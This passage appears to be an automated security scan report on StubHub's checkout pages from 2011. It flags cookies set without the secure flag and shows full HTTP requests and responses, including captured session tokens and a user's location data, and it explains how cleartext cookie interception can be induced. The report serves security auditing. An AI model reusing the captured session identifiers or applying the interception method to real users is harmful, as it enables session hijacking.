If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


2.1. https://buy.stubhub.com/checkout/checkoutsignin.signin.guestform  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://buy.stubhub.com
Path:   /checkout/checkoutsignin.signin.guestform

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /checkout/checkoutsignin.signin.guestform HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
Origin: https://buy.stubhub.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; mbox=check#true#1297856609|session#1297856457596-151700#1297858409|PC#1297856457596-151700.17#1332070949|disable#browser%20timeout#1297860107; TLTHID=CF560F4839C1103958ADC35B4524558D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B
Content-Length: 391

t%3Aformdata=H4sIAAAAAAAAAK2PMUpDQRRFnwGrVArZgbYTC9NoFQRFDCIM1vL%2BzMv8l%2Fw%2FM8680WQzrkDcRAo79%2BACbK0s%2FMlfgWB14XI5h%2Fv6BfvPN3B9UZNZhiKanWd%2FlneharaW%2FJypscXzYyGMsaXWoKlpSeuHE9XXmXLm4F1hmxNMQnI
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Date: Wed, 16 Feb 2011 11:42:25 GMT
Server: Apache
Set-Cookie: TLTHID=D34B2BA639C11039039AC88CFE43A8B9; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 17d2#1986/checkout/checkoutsignin.signin.guestform@srwp01byx002.stubprod.com
com-stubhub-dye: 17d2#1986/checkout/checkoutsignin.signin.guestform@srwp01byx002.stubprod.com
Set-Cookie: STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; Domain=.stubhub.com; Path=/
Location: https://buy.stubhub.com/checkout/checkout?logisticsMethod=2&price=100.0&quantity_selected=2&ticket_id=281933854
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8


2.2. https://buy.stubhub.com/checkout/CheckoutSignin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/CheckoutSignin

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2 HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; TLTHID=B723884239C110395882C35B4524558D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856496083,"l":"en","i":-1}

Response

HTTP/1.1 200 OK
Date: Wed, 16 Feb 2011 11:42:16 GMT
Server: Apache
Set-Cookie: TLTHID=CDDE81CC39C11039023392EDD8A51875; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: c734#4f6/checkout/CheckoutSignin@srwp01byx007.stubprod.com
com-stubhub-dye: c734#4f6/checkout/CheckoutSignin@srwp01byx007.stubprod.com
Set-Cookie: JSESSIONID=96F40F445A335AAA72307D9D93536BAD; Path=/; Secure
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 19928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-US" xmlns:sh="http://www.stubhub.com/NS/wp" xmlns="http://www.w3
...[SNIP]...

2.3. https://buy.stubhub.com/checkout/CheckoutSignin/ticket_id=281933854&quantity_selected=2&logisticsMethod=2&price=100.0&affiliate_id=null  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/CheckoutSignin/ticket_id=281933854&quantity_selected=2&logisticsMethod=2&price=100.0&affiliate_id=null

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/CheckoutSignin/ticket_id=281933854&quantity_selected=2&logisticsMethod=2&price=100.0&affiliate_id=null HTTP/1.1
Host: buy.stubhub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856557280,"l":"en","i":-1}; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; fsr.a=1297856559479; TLTHID=D5786C9039C110397C9DCBB7689B8A72; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; TLTSID=986DBE4039C110390BC5EFD87B2B5667;

Response

HTTP/1.0 302 Moved Temporarily
Date: Wed, 16 Feb 2011 11:42:53 GMT
Server: Apache
Set-Cookie: TLTHID=E3D5265C39C1103900D58A80A84B62C0; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: bc79#182/checkout/CheckoutSignin/ticket_id=281933854&quantity_selected=2&logisticsMethod=2&price=100.0&affiliate_id=null@srwp01byx009.stubprod.com
com-stubhub-dye: bc79#182/checkout/CheckoutSignin/ticket_id=281933854&quantity_selected=2&logisticsMethod=2&price=100.0&affiliate_id=null@srwp01byx009.stubprod.com
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Location: https://www.stubhub.com/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


2.4. https://buy.stubhub.com/checkout/assets/default.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/assets/default.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/assets/default.css HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; TLTHID=CD83878639C1103903C3B0044C7300DA; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}

Response

HTTP/1.1 404 Not Found
Date: Wed, 16 Feb 2011 11:42:18 GMT
Server: Apache
Set-Cookie: TLTHID=CEBCC36039C11039A5D3871236610E4F; Path=/; Domain=.stubhub.com
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=1600
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Content-Length: 334

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /checkout/assets/default.css was not found on this se
...[SNIP]...

2.5. https://buy.stubhub.com/checkout/checkout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/checkout

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/checkout?logisticsMethod=2&price=100.0&quantity_selected=2&ticket_id=281933854 HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; 